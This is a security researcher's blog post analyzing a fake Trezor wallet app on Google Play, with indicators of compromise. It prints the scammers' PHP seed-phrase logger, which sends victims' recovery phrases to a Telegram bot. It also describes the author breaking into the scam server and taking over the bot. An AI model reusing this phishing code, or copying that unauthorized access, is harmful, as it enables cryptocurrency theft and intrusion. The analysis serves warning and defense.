<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <link rel="icon" href="/assets/img/favicon.ico"/>
    <link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed.xml" />

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Analysis of the Fake Trezor Mobile Wallet app in the Play Store | Kamil Vavra @vavkamil</title>
<meta name="generator" content="Jekyll v4.3.2" />
<meta property="og:title" content="Analysis of the Fake Trezor Mobile Wallet app in the Play Store" />
<meta name="author" content="vavkamil" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="tl;dr: I analyzed the fake Trezor Android application on Google Play Store, compromised the backend, and said hello to the developer." />
<meta property="og:description" content="tl;dr: I analyzed the fake Trezor Android application on Google Play Store, compromised the backend, and said hello to the developer." />
<link rel="canonical" href="http://localhost:4000/blog/2021-04-14-analysis-of-the-fake-trezor-mobile-wallet-app-in-the-play-store/" />
<meta property="og:url" content="http://localhost:4000/blog/2021-04-14-analysis-of-the-fake-trezor-mobile-wallet-app-in-the-play-store/" />
<meta property="og:site_name" content="Kamil Vavra @vavkamil" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-04-14T02:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Analysis of the Fake Trezor Mobile Wallet app in the Play Store" />
<meta name="twitter:site" content="@vavkamil" />
<meta name="twitter:creator" content="@vavkamil" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"vavkamil"},"dateModified":"2021-04-14T02:00:00+02:00","datePublished":"2021-04-14T02:00:00+02:00","description":"tl;dr: I analyzed the fake Trezor Android application on Google Play Store, compromised the backend, and said hello to the developer.","headline":"Analysis of the Fake Trezor Mobile Wallet app in the Play Store","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/blog/2021-04-14-analysis-of-the-fake-trezor-mobile-wallet-app-in-the-play-store/"},"url":"http://localhost:4000/blog/2021-04-14-analysis-of-the-fake-trezor-mobile-wallet-app-in-the-play-store/"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <a id="a-title" href="/">
          <h1>Kamil Vavra | @vavkamil</h1>
        </a>
        <h2>Offensive website security | Bug bounty | Ethical hacking</h2>

        <section id="downloads">
          <a href="/talks" class="btn"><span class="icon">📢</span>Talks</a>
          <a href="/whoami" class="btn"><span class="icon">🕵️</span>Whoami</a>
          <a href="/bug-bounty" class="btn"><span class="icon">💰</span>Bug bounty</a>
          <a href="/blog" class="btn"><span class="icon">📖</span>Blog</a>
          <a href="https://github.com/vavkamil" target="_blank" class="btn"><span class="icon">💻</span>GitHub</a>
          <a href="https://www.linkedin.com/in/vavkamil/" target="_blank" class="btn"><span class="icon">🏆</span>LinkedIn</a>
          <a href="/contact" class="btn"><span class="icon">📩</span>Contact</a><br><br>
        </section>
      </div>
    </header>

    <div class="container">
      <section id="main_content">
        <small>14 April 2021</small>
<h1>Analysis of the Fake Trezor Mobile Wallet app in the Play Store</h1>

<p class="view">by vavkamil</p>

<div>



  <p>5 minutes to read</p>

</div>

<p>tl;dr: I analyzed the fake Trezor Android application on Google Play Store, compromised the backend, and said hello to the developer.</p>

<hr />

<p>A story about a person losing 7.1 bitcoin worth ~$600,000 due to a fake “Trezor” app in the App Store <a href="https://www.washingtonpost.com/technology/2021/03/30/trezor-scam-bitcoin-1-million/">made the news</a> very recently. According to the article, five people have reported having cryptocurrency stolen by the fake Trezor app on iOS, for total losses worth $1.6 million.</p>

<p>I saw another fake Trezor app pop-up on Google Play Store yesterday. People on Reddit were downloading the app to see what it does and to warn others. That caught my attention because it’s generally not a good idea to install something like this blindly.</p>

<hr />

<h3 id="android-app">Android app</h3>

<p><img src="/assets/img/2021/04/google-play-store.png" alt="" title="google-play-store" /></p>

<p>The Play Store listing had an almost five-star rating, a couple of primarily fake reviews, and around ~500 downloads. It looked somewhat believable to the casual user.</p>

<p><img src="/assets/img/2021/04/play-store-reviews.png" alt="" title="play-store-reviews" /></p>

<p>I pulled the .apk file from Play Store and decompiled it. From the first look, it was not malware, which was good.</p>

<p><code class="language-plaintext highlighter-rouge">$ sha256sum mobile-wallet-trezor-io_1.0.apk 1cc9a9748ccd210fb8aa06b1ae5b48ca3805eed12c670818a75e833733376b7f</code></p>

<p>In the “/sources/com/rzor/p034tr/MainActivity.java” file on line 206, we could see this message:</p>

<p><code class="language-plaintext highlighter-rouge">MainActivity.this.mo4371l0("This app is created using an unauthorized copy of 'Website 2 APK Builder Pro' Software.", "Unauthorized App", "Shame on me!");</code></p>

<p>And on the line 1196:</p>

<p><code class="language-plaintext highlighter-rouge">this.f2862z = "https://sliu3err-restaurant.com";</code></p>

<p><img src="/assets/img/2021/04/website-passphrase.png" alt="" title="website-passphrase" /></p>

<p>So the Android application was just a WebView for the phishing website. The only functionality was to enter the 12/24 backup word phrase to connect the Trezor. Anyone who uses Trezor should know that you are never supposed to enter it anywhere, but sadly, people are still falling for it.</p>

<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Warning to all Trezor owners using Android devices!<br /><br />This app is malicious and has no relation to Trezor or SatoshiLabs. Please, don&#39;t install it.<br /><br />Remember that you should never share your seed with anyone until your Trezor device asks you to do it! <a href="https://t.co/6C3iKfPDnR">pic.twitter.com/6C3iKfPDnR</a></p>&mdash; Trezor (@Trezor) <a href="https://twitter.com/Trezor/status/1351123945911705602?ref_src=twsrc%5Etfw">January 18, 2021</a></blockquote>
<script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

<hr />

<h3 id="server-compromise">Server compromise</h3>

<p>After getting access to the web server, just to look around and see how the backend works, I was surprised by how basic it was. In the “index.php” file was an IP logger:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span>
<span class="nv">$dir</span> <span class="o">=</span> <span class="s1">'vixrs'</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">is_dir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">)){</span>	<span class="nb">mkdir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span><span class="mo">0777</span><span class="p">);</span>
<span class="p">}</span>
<span class="nv">$file</span> <span class="o">=</span> <span class="nb">date</span><span class="p">(</span><span class="s1">'Y-m-d'</span><span class="p">)</span><span class="mf">.</span><span class="s1">'.txt'</span><span class="p">;</span>
<span class="nv">$ip</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REMOTE_ADDR'</span><span class="p">];</span>
<span class="nv">$browser</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_USER_AGENT'</span><span class="p">];</span>
<span class="nv">$ipInfo</span> <span class="o">=</span> <span class="nf">grabIpInfo</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s2">"REMOTE_ADDR"</span><span class="p">]);</span>
<span class="nv">$filename</span> <span class="o">=</span> <span class="nv">$dir</span><span class="mf">.</span><span class="s1">'/'</span><span class="mf">.</span><span class="nv">$file</span><span class="p">;</span>
<span class="nv">$url</span> <span class="o">=</span> <span class="s2">"http://</span><span class="nv">$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]</span><span class="s2">"</span><span class="p">;</span>
<span class="nv">$info</span> <span class="o">=</span> <span class="s1">'
 
===========================
IP: '</span><span class="mf">.</span><span class="nv">$ip</span> <span class="mf">.</span><span class="s1">'
Browser: '</span><span class="mf">.</span><span class="nv">$browser</span> <span class="mf">.</span><span class="s1">'
Ipinfo: '</span><span class="mf">.</span><span class="nv">$ipInfo</span> <span class="mf">.</span><span class="s1">'
Time: '</span><span class="mf">.</span><span class="nb">date</span><span class="p">(</span><span class="s1">'d/m/Y H:i:s a'</span><span class="p">)</span><span class="mf">.</span><span class="s1">'
Filename: '</span><span class="mf">.</span><span class="nb">basename</span><span class="p">(</span><span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'PHP_SELF'</span><span class="p">])</span><span class="mf">.</span><span class="s1">'
URL: '</span><span class="mf">.</span><span class="nv">$url</span><span class="mf">.</span><span class="s1">'
'</span><span class="p">;</span>
<span class="nb">file_put_contents</span><span class="p">(</span><span class="nv">$filename</span><span class="p">,</span> <span class="nv">$info</span><span class="p">,</span> <span class="no">FILE_APPEND</span><span class="p">);</span>

<span class="k">function</span> <span class="n">grabIpInfo</span><span class="p">(</span><span class="nv">$ip</span><span class="p">)</span>
<span class="p">{</span>

  <span class="nv">$curl</span> <span class="o">=</span> <span class="nb">curl_init</span><span class="p">();</span>

  <span class="nb">curl_setopt</span><span class="p">(</span><span class="nv">$curl</span><span class="p">,</span> <span class="no">CURLOPT_URL</span><span class="p">,</span> <span class="s2">"http://ipwhois.app/json/</span><span class="nv">$ip</span><span class="s2">"</span><span class="p">);</span>
  <span class="nb">curl_setopt</span><span class="p">(</span><span class="nv">$curl</span><span class="p">,</span> <span class="no">CURLOPT_RETURNTRANSFER</span><span class="p">,</span> <span class="kc">TRUE</span><span class="p">);</span>

  <span class="nv">$returnData</span> <span class="o">=</span> <span class="nb">curl_exec</span><span class="p">(</span><span class="nv">$curl</span><span class="p">);</span>

  <span class="nb">curl_close</span><span class="p">(</span><span class="nv">$curl</span><span class="p">);</span>

  <span class="k">return</span> <span class="nv">$returnData</span><span class="p">;</span>

<span class="p">}</span>

<span class="nv">$ipJsonInfo</span> <span class="o">=</span> <span class="nb">json_decode</span><span class="p">(</span><span class="nv">$ipInfo</span><span class="p">);</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>And in the “seed.php” file was the passphrase logger:</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?php</span> 
    <span class="nv">$token</span> <span class="o">=</span> <span class="s2">"16308!REDACTED!NyZV60tUX5ptudhtnSLj_nBNdo"</span><span class="p">;</span>

    <span class="nv">$data</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"text"</span> <span class="o">=&gt;</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s1">'seed'</span><span class="p">],</span><span class="s1">'chat_id'</span> <span class="o">=&gt;</span> <span class="s1">'-59!REDACTED!38'</span><span class="p">];</span>

    <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"https://api.telegram.org/bot</span><span class="nv">$token</span><span class="s2">/sendMessage?"</span> <span class="mf">.</span> <span class="nb">http_build_query</span><span class="p">(</span><span class="nv">$data</span><span class="p">)</span> <span class="p">);</span>
    <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
<span class="cp">?&gt;</span>
</code></pre></div></div>

<p>Essentially, when the victim installed the Android app and entered the Trezor seed passphrase, the Telegram bot immediately sent it to the encrypted group chat. And the scammers began the recovery phase to empty the cryptocurrency balance.</p>

<p>While having access to the Telegram API token, I invited myself to the chat group. Unfortunately, I or the bot couldn’t see previous messages, so all I could do was say hello to the scammer. Their name was “Pinern nuere” with the username “caerwe3423”.</p>

<p><img src="/assets/img/2021/04/telegram-conversation.png" alt="" title="telegram-conversation" /></p>

<p>There was nothing more to do, so I just disabled the bot, so it no longer could forward the passphrases and called it a night. In the morning, the fake app was no longer on Play Store, so mission accomplished.</p>

<hr />

<h3 id="statistics">Statistics</h3>

<p>Since I grabbed the IP logs from a couple of days, I can share some stats. The backend was reused for all the variations of the scam. Most of the hits were from phones, with a wide range of Android versions worldwide:</p>

<p><strong>Day one:</strong></p>

<ul>
  <li>63 unique IP addresses</li>
  <li>30 unique countries</li>
  <li>62  unique user agents</li>
</ul>

<p><strong>Day two:</strong></p>

<ul>
  <li>116 unique IP addresses</li>
  <li>44 unique countries</li>
  <li>104  unique user agents</li>
</ul>

<p><strong>Day three:</strong></p>

<ul>
  <li>373 unique IP addresses</li>
  <li>51 unique countries</li>
  <li>326  unique user agents</li>
</ul>

<p><strong>Day four:</strong></p>

<ul>
  <li>51 unique IP addresses</li>
  <li>20 unique countries</li>
  <li>52 unique user agents</li>
</ul>

<p><strong>Day five:</strong></p>

<ul>
  <li>10 unique IP addresses</li>
  <li>6 unique countries</li>
  <li>9 unique user agents</li>
</ul>

<p>I don’t know how many of them were compromised, but hopefully zero.</p>

<hr />

<h3 id="indicators-of-compromise">Indicators of compromise</h3>

<ul>
  <li>https://play.google.com/store/apps/details?id=com.rzor.tr</li>
  <li>
    <p>https://play.google.com/store/apps/details?id=com.tzr.trz2</p>
  </li>
  <li>hXXps://sliuerr-restaurant.com</li>
  <li>hXXps://sliu3rr-restaurant.com</li>
  <li>hXXps://sliu3err-restaurant.com</li>
</ul>



  <small>tags: <em>trezor</em> - <em>bitcoin</em> - <em>scam</em> - <em>cryptocurrency</em></small>



      </section>
    </div>

    <hr>
    
    
    Content on this site is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/" target="_blank">Creative Commons Attribution 4.0 International License</a><br />
    &#127279; 2019&dash;2026 - <strong>@vavkamil</strong> - <a href="https://github.com/vavkamil/vavkamil.cz" target="_blank">Open-source</a> Github pages - Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> &amp; <a href="https://github.com/pages-themes/hacker" target="_blank">The Hacker theme</a> - Subscribe via <a href="http://localhost:4000/feed.xml">RSS</a>
  </body>
</html>
